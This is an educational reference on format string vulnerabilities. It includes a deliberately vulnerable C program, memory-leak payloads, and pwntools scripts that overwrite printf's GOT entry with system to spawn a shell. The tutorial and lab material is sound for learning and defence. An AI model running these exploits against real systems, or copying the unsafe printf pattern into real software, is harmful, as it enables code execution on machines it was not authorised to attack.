Format String Vulnerabilities
Overview
A format string vulnerability occurs when user-controlled input is passed
directly as the format argument to printf, fprintf, sprintf, or similar
functions. printf fetches one argument per conversion whether or not the caller
supplied it, so %x and %s read whatever sits in the argument registers and on
the stack, and %n writes through a pointer found there. An attacker can use
them to leak memory contents or write chosen values to chosen addresses.
ATT&CK Mapping
- Tactic: TA0002 - Execution
- Technique: T1203 - Exploitation for Client Execution
Prerequisites
- A binary where user input reaches a printf-family function as the format string (not as an argument to a format string)
- GDB with pwndbg for debugging
- pwntools for exploit scripting
Vulnerable vs Safe Code
// VULNERABLE — user input IS the format string
printf(user_input);
fprintf(stderr, user_input);
sprintf(buf, user_input);
// SAFE — user input is an argument, not the format string
printf("%s", user_input);
fprintf(stderr, "%s", user_input);
sprintf(buf, "%s", user_input);
Vulnerable Code Example
// fmtvuln.c — compile with: gcc -fno-stack-protector -no-pie -o fmtvuln fmtvuln.c
#include <stdio.h>
int main(void) {
    char buf[256];
    while (fgets(buf, sizeof(buf), stdin)) {
        printf(buf); // format string vulnerability
    }
    return 0;
}
Format Specifiers for Exploitation
| Specifier | Action | Exploit Use |
|---|---|---|
| %x | Print 4 bytes from stack (hex) | Leak stack values |
| %lx | Print 8 bytes from stack (hex, 64-bit) | Leak 64-bit addresses |
| %p | Print pointer (same as 0x%lx) | Leak addresses |
| %s | Print string at address on stack | Leak memory at pointer |
| %n | Write number of bytes printed to address on stack | Arbitrary write |
| %hn | Write 2 bytes (short) | Partial write |
| %hhn | Write 1 byte (char) | Byte-level write |
| %<N>$x | Print Nth argument (direct parameter access) | Target specific stack offset |
| %<N>$n | Write to Nth argument address | Write to specific offset |
Reading Stack Values (Information Leak)
Sequential Leak
Each %lx consumes the next 8-byte argument. On x86-64 the first five come from
registers (RSI, RDX, RCX, R8, R9) and the rest from the stack:
# Send to the vulnerable binary
echo 'AAAAAAAA.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx' | ./fmtvuln
Output:
AAAAAAAA.7fffffffdf80.0.0.4141414141414141.252e786c252e786c.786c252e786c252e...
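The value 0x4141414141414141 is the AAAAAAAA from the input itself. Its position
in the output, counting from 1, is the argument offset at which your input
appears. Exact values and positions vary with the compiler and environment.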
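Picking the marker out by eye gets tedious on longer leaks. The following is a minimal sketch, assuming the dot-separated output format shown above; the helper name find_marker_position is hypothetical and not part of any library.

```python
from typing import Optional


def find_marker_position(output: str, marker: bytes = b"AAAAAAAA") -> Optional[int]:
    """Return the 1-based position of the leaked word equal to `marker`.

    Assumes `output` is the echoed marker followed by dot-separated hex
    words, as produced by a payload like 'AAAAAAAA.%lx.%lx...'.
    """
    # On little-endian x86-64 the 8 marker bytes are read back as one integer.
    wanted = int.from_bytes(marker, "little")
    fields = output.strip().split(".")[1:]  # drop the echoed marker itself
    for position, field in enumerate(fields, start=1):
        try:
            if int(field, 16) == wanted:
                return position
        except ValueError:
            continue  # skip truncated or non-hex fields
    return None


# Sample line copied from the output above (without the trailing ellipsis)
sample = "AAAAAAAA.7fffffffdf80.0.0.4141414141414141.252e786c252e786c"
print(find_marker_position(sample))
```

The returned position is the N to use in %N$lx style specifiers against the same build of the binary.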
Direct Parameter Access
Use %N$lx to read specific stack positions without consuming intermediate
values:
# Read the 6th argument from the stack
echo '%6$lx' | ./fmtvuln
# Read positions 1 through 20
for i in $(seq 1 20); do echo "%${i}\$p" | ./fmtvuln; done
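Spawning one process per position works but is slow. As a sketch, the same probes can be packed into a single input line, provided it fits the 256-byte buffer that fgets fills in fmtvuln.c. The function names are illustrative, and the parser assumes glibc-style %p output (0x... or (nil)).

```python
def build_probe(first: int, last: int, limit: int = 254) -> bytes:
    """Build one line that reads arguments first..last with %N$p.

    `limit` leaves room for the newline and the terminating null byte in a
    256-byte fgets buffer (an assumption taken from fmtvuln.c).
    """
    probe = ".".join(f"%{i}$p" for i in range(first, last + 1)).encode()
    if len(probe) > limit:
        raise ValueError(f"probe is {len(probe)} bytes, limit is {limit}")
    return probe


def parse_probe(reply: str, first: int) -> dict:
    """Map each argument position to the integer value that was leaked."""
    values = {}
    for position, field in enumerate(reply.strip().split("."), start=first):
        # glibc prints a null pointer as "(nil)" rather than 0x0
        values[position] = 0 if field == "(nil)" else int(field, 16)
    return values


print(build_probe(1, 3))
```

With pwntools, the probe would be sent with sendline() and the reply line passed to parse_probe().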
Finding Your Input Offset
The offset where your input appears on the stack is critical for write
exploits. Identify it by looking for 0x4141414141414141 in the output:
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
context.binary = './fmtvuln'
# Find the offset where our input appears on the stack
for i in range(1, 30):
p = process('./fmtvuln')
p.sendline(f'AAAAAAAA%{i}$lx'.encode())
result = p.recvline()
if b'4141414141414141' in result:
log.success(f'Input at offset: {i}')
break
p.close()
Arbitrary Write with %n
The %n specifier stores the number of characters printed so far into the int
whose address is given by the corresponding argument. By placing a target address
on the stack (in your input buffer) and using %n at the offset of that slot, you
write to that address.
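Because the stored value is the running character count, writing a multi-byte value one byte at a time with %hhn comes down to modular arithmetic: each write only needs the low 8 bits of the count to match. A minimal sketch of that arithmetic follows; the function names are hypothetical and the code only plans the writes, it does not build a payload.

```python
def hhn_padding(already_printed: int, target_byte: int) -> int:
    """Characters still to print so the count's low byte equals target_byte."""
    return (target_byte - already_printed) % 256


def plan_byte_writes(addr: int, value: int, nbytes: int = 8) -> list:
    """Return (address, byte, padding) tuples for consecutive %hhn writes.

    Bytes are written in little-endian order, lowest address first.
    A padding of 0 means no %c padding should be emitted before that write.
    """
    printed = 0
    plan = []
    for i, byte in enumerate(value.to_bytes(nbytes, "little")):
        pad = hhn_padding(printed, byte)
        printed += pad
        plan.append((addr + i, byte, pad))
    return plan


for address, byte, pad in plan_byte_writes(0x404060, 0x401136, nbytes=3):
    print(hex(address), hex(byte), pad)
```

The count never decreases, so a target byte smaller than the current low byte is reached by wrapping past 256, which is why some paddings are large.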
Writing a Small Value
To write the value 0x42 (66 decimal) to address 0x404060:
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
context.binary = './fmtvuln'
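target_addr = 0x404060  # address to write to
write_value = 0x42      # value to write
input_offset = 6        # where our input appears on the stack
# p64(target_addr) contains null bytes, and printf stops parsing at the first
# one, so the address must come after the specifiers. Pad the specifiers to
# 16 bytes (two 8-byte slots); the address then sits at input_offset + 2.
fmt = f'%{write_value}c%{input_offset + 2}$hhn'.encode()
payload = fmt.ljust(16, b'A') + p64(target_addr)
p = process('./fmtvuln')
p.sendline(payload)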
pwntools fmtstr_payload
pwntools provides fmtstr_payload() to automate format string writes:
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
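context.binary = elf = ELF('./fmtvuln')
libc = elf.libc  # fmtvuln does not import system, so resolve it from libc
# Offset where input appears on the stack
input_offset = 6
p = process('./fmtvuln')
# Stage 1: leak the resolved printf address from the GOT to find the libc base.
# The address follows the 8-byte specifier, so it sits in slot 7 (input_offset + 1).
p.sendline(b'%7$s||||' + p64(elf.got['printf']))
leak = u64(p.recvuntil(b'||||', drop=True).ljust(8, b'\x00'))
libc.address = leak - libc.symbols['printf']
# Stage 2: write system's address over printf's GOT entry
# fmtstr_payload(offset, {addr: value})
payload = fmtstr_payload(input_offset, {elf.got['printf']: libc.symbols['system']})
p.sendline(payload)
p.sendline(b'/bin/sh')  # next printf(buf) call now runs system("/bin/sh")
p.interactive()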
fmtstr_payload parameters:
- First argument: the stack offset where input appears
- Second argument: dictionary of {address: value} pairs to write
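To make the layout concrete, here is a hand-rolled sketch of a single-byte write for x86-64. It is not pwntools's implementation; build_byte_write and its fmt_len parameter are hypothetical names. It assumes the input starts at the given stack offset and that the address must follow the specifiers, because the null bytes in a 64-bit address would otherwise end the format string early.

```python
import struct


def build_byte_write(input_offset: int, addr: int, byte: int, fmt_len: int = 16) -> bytes:
    """Build a payload that writes one byte to addr with %hhn.

    Layout: [specifiers padded to fmt_len bytes][8-byte little-endian address]
    """
    if fmt_len % 8 != 0:
        raise ValueError("fmt_len must be a multiple of 8 to keep the address aligned")
    # Each 8 bytes of specifier text occupies one argument slot.
    arg_index = input_offset + fmt_len // 8
    # Omit the %c padding entirely when the byte to write is 0.
    pad = f"%{byte}c" if byte else ""
    fmt = f"{pad}%{arg_index}$hhn".encode()
    if len(fmt) > fmt_len:
        raise ValueError("specifiers do not fit in fmt_len bytes")
    # Filler comes after %hhn, so it does not change the value written.
    return fmt.ljust(fmt_len, b"A") + struct.pack("<Q", addr)


print(build_byte_write(6, 0x404060, 0x42))
```

For multi-byte or multi-address writes, fmtstr_payload() remains the practical choice; this sketch only shows why the address lands two slots past the input offset.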
GOT Overwrite via Format String
The Global Offset Table (GOT) holds the runtime addresses of imported library functions, and calls made through the PLT jump to whatever address is stored there. On binaries with Partial RELRO (or no RELRO), these entries stay writable, so overwriting one redirects every later call to that function.
Common targets:
| Overwrite | With | Effect |
|---|---|---|
| printf@GOT | system | Next printf(input) becomes system(input) |
| puts@GOT | system | Next puts(input) becomes system(input) |
| exit@GOT | main | Prevents exit, loops back for more writes |
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
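context.binary = elf = ELF('./fmtvuln')
p = process('./fmtvuln')
# fmtvuln never imports system, so take its address from libc. For a local
# process, p.libc is the loaded libc already rebased; a remote target needs a leak.
libc = p.libc
# Overwrite printf GOT entry with system
payload = fmtstr_payload(6, {elf.got['printf']: libc.symbols['system']})
p.sendline(payload)
# Now printf calls system, so send a command
p.sendline(b'/bin/sh')
p.interactive()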
This only works with:
- Partial RELRO (GOT is writable)
- No PIE (GOT address is known), or PIE with a leaked binary base
Debugging Format Strings
# GDB
# https://www.gnu.org/software/gdb/
gdb ./fmtvuln
# Break at printf
(gdb) break printf
# Run and send format string
# Single quotes stop the shell from expanding $lx as a variable
(gdb) run <<< 'AAAA%6$lx'
# When printf is hit, examine the stack
(gdb) x/20xg $rsp
# The format string arguments start at RSI (2nd arg), RDX (3rd),
# RCX (4th), R8 (5th), R9 (6th), then stack positions
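The register-then-stack order above can be turned into a small lookup that says where to inspect the Nth format argument in GDB. This is a sketch assuming the System V AMD64 calling convention and a breakpoint at printf's entry, where [rsp] holds the return address; locate_argument is a hypothetical helper.

```python
# Registers that carry printf's first five variadic arguments (RDI holds the format)
REGISTER_ARGS = ("rsi", "rdx", "rcx", "r8", "r9")


def locate_argument(n: int) -> str:
    """Return where the Nth format argument (as in %N$lx) lives at printf entry."""
    if n < 1:
        raise ValueError("argument positions start at 1")
    if n <= len(REGISTER_ARGS):
        return REGISTER_ARGS[n - 1]
    # Skip the return address at [rsp], then 8 bytes per stack argument.
    offset = 8 + 8 * (n - len(REGISTER_ARGS) - 1)
    return f"[rsp+{offset:#x}]"


for n in (1, 5, 6, 8):
    print(n, locate_argument(n))
```

For example, position 6 maps to [rsp+0x8], which can be checked with x/gx $rsp+0x8 while stopped at the breakpoint.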